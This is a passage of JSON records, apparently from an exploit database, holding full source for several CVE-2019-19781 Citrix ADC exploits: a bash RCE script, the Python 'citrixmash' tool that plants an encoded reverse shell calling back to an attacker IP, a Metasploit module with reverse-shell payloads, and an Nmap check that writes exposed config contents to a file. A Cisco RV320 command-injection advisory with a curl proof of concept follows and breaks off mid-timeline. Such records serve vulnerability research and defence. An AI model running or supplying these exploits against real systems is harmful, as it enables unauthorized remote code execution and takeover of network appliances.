9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T00:00:00", "type": "exploitdb", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19781", "CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EDB-ID:47901", "href": "https://www.exploit-db.com/exploits/47901", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "sourceHref": "https://www.exploit-db.com/download/47901", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:07:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T00:00:00", "type": "exploitdb", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-1978", "CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EDB-ID:47902", "href": "https://www.exploit-db.com/exploits/47902", "sourceData": "#!/usr/bin/python3\r\n#\r\n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\r\n#\r\n# You only need a listener like netcat to catch the shell.\r\n#\r\n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White\r\n#\r\n# Tool Written by: Rob Simon and David Kennedy\r\n\r\nimport requests\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings\r\nimport random\r\nimport string\r\nimport time\r\nfrom random import randint\r\nimport argparse\r\nimport sys\r\n\r\n# random string generator\r\ndef randomString(stringLength=10):\r\n letters = string.ascii_lowercase\r\n return ''.join(random.choice(letters) for i in range(stringLength))\r\n\r\n# our random string for filename - will leave artifacts on system\r\nfilename = randomString()\r\nrandomuser = randomString()\r\n\r\n# generate random number for the nonce\r\nnonce = randint(5, 15) \r\n\r\n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script\r\n# note that the file location will be in /netscaler/portal/templates/filename.xml\r\ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):\r\n\r\n # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)\r\n encoded = \"\"\r\n i=0\r\n text = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport))\r\n while i < len(text):\r\n encoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \"\r\n i += 1\r\n encoded = encoded[:-3]\r\n payload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\"\r\n headers = ( \r\n {\r\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\r\n 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),\r\n 'NSC_NONCE' : '%s' % (nonce),\r\n })\r\n\r\n data = (\r\n {\r\n \"url\" : \"127.0.0.1\",\r\n \"title\" : payload,\r\n \"desc\" : \"desc\",\r\n \"UI_inuse\" : \"a\"\r\n })\r\n\r\n url = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport))\r\n requests.post(url, data=data, headers=headers, verify=False)\r\n\r\n# this is our second stage that triggers the exploit for us\r\ndef stage2(filename, randomuser, nonce, victimip, victimport):\r\n headers = (\r\n {\r\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\r\n 'NSC_USER' : '%s' % (randomuser),\r\n 'NSC_NONCE' : '%s' % (nonce),\r\n })\r\n\r\n requests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False)\r\n\r\n\r\n# start our main code to execute\r\nprint('''\r\n\r\n .o oOOOOOOOo OOOo\r\n Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO\r\n OboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO\r\n OOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB'\r\n `O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo\r\n .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO\r\n OOOOO '\"OOOOOOOOOOOOOOOO\"` oOO\r\n oOOOOOba. .adOOOOOOOOOOba .adOOOOo.\r\n oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO\r\n OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO\r\n \"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\"\r\n Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`\r\n : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .\r\n . oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo\r\n '%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO':\r\n `$\" `OOOO' `O\"Y ' `OOOO' o .\r\n . . OP\" : o .\r\n :\r\n\r\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\r\nTool Written by: Rob Simon and Dave Kennedy\r\nContributions: The TrustedSec Team \r\nWebsite: https://www.trustedsec.com\r\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\r\n\r\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\r\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\r\n\r\nBe sure to cleanup these two file locations:\r\n /var/tmp/netscaler/portal/templates/\r\n /netscaler/portal/templates/\r\n\r\nUsage:\r\n\r\npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''')\r\n\r\n# parse our commands\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\")\r\nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\")\r\nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\")\r\nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\")\r\nargs = parser.parse_args()\r\nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\")\r\nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename))\r\n# trigger our first post\r\nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)\r\nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\")\r\ntime.sleep(2)\r\nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\")\r\nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\")\r\nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\")\r\n# trigger our second post\r\nstage2(filename, randomuser, nonce, args.target, args.targetport)", "sourceHref": "https://www.exploit-db.com/download/47902", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:07:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "exploitdb", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19781", "CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "EDB-ID:47913", "href": "https://www.exploit-db.com/exploits/47913", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/47913", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:07:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-16T00:00:00", "type": "exploitdb", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19781", "CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "EDB-ID:47930", "href": "https://www.exploit-db.com/exploits/47930", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# Date: 2019-12-17\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend", "sourceHref": "https://www.exploit-db.com/download/47930", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T02:13:53", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-25T00:00:00", "type": "exploitdb", "title": "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-1652", "CVE-2019-1652"], "modified": "2019-01-25T00:00:00", "id": "EDB-ID:46243", "href": "https://www.exploit-db.com/exploits/46243", "sourceData": "RedTeam Pentesting discovered a command injection vulnerability in the\r\nweb-based certificate generator feature of the Cisco RV320 router.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 and later\r\nFixed Versions: since 1.4.2.20\r\nVulnerability Type: Remote Code Execution\r\nSecurity Risk: medium\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004\r\nAdvisory Status: published\r\nCVE: CVE-2019-1652\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe router's web interface enables users to generate new X.509\r\ncertificates directly on the device. A user may enter typical\r\nconfiguration parameters required for the certificate, such as\r\norganisation, the common name and so on. In order to generate the\r\ncertificate, the device uses the command-line program openssl [2]. The\r\ndevice's firmware uses the following format string to assemble the\r\nopenssl command:\r\n\r\n------------------------------------------------------------------------\r\nopenssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1\r\n------------------------------------------------------------------------\r\n\r\nAlthough the web interface filters certain special characters via\r\nJavaScript, there is actually no input filtering, escaping or encoding\r\nhappening on the server. This allows attackers to inject arbitrary\r\ncommands.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nEven though all components of the subject seem to be vulnerable to\r\ncommand injection, the following example uses the common name to trigger\r\na ping command:\r\n\r\n------------------------------------------------------------------------\r\na'$(ping -c 4 192.168.1.2)'b\r\n------------------------------------------------------------------------\r\n\r\nThe following HTTP POST request invokes the certificate generator\r\nfunction and triggers the command injection. It requires a valid session\r\ncookie for the device's web interface.\r\n\r\n------------------------------------------------------------------------\r\ncurl -s -b \"$COOKIE\" \\\r\n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\\r\n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\\r\n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\\r\n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\\r\n\"SelectSubject_s=1\" \\\r\n--data-urlencode \"common_name=a'\\$(ping -c 4 192.168.1.2)'b\" \\\r\n\"http://192.168.1.1/certificate_handle2.htm?type=4\"\r\n------------------------------------------------------------------------\r\n\r\nAfterwards, the incoming ICMP echo requests can be observed on the\r\nattacker's system at 192.168.1.2.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted users from using the router's web interface.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall firmware version 1.4.2.20 (or later) on the router.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability allows attackers with administrative access to the\r\nrouter's web interface to execute arbitrary operating system commands on\r\nthe device. Because attackers require valid credentials to the web\r\ninterface, this vulnerability is only rated as a medium risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2018-09-19 Vulnerability identified\r\n2018-09-27 Customer approved disclosure to vendor\r\n2018-09-28 Vendor notified\r\n2018-10-05 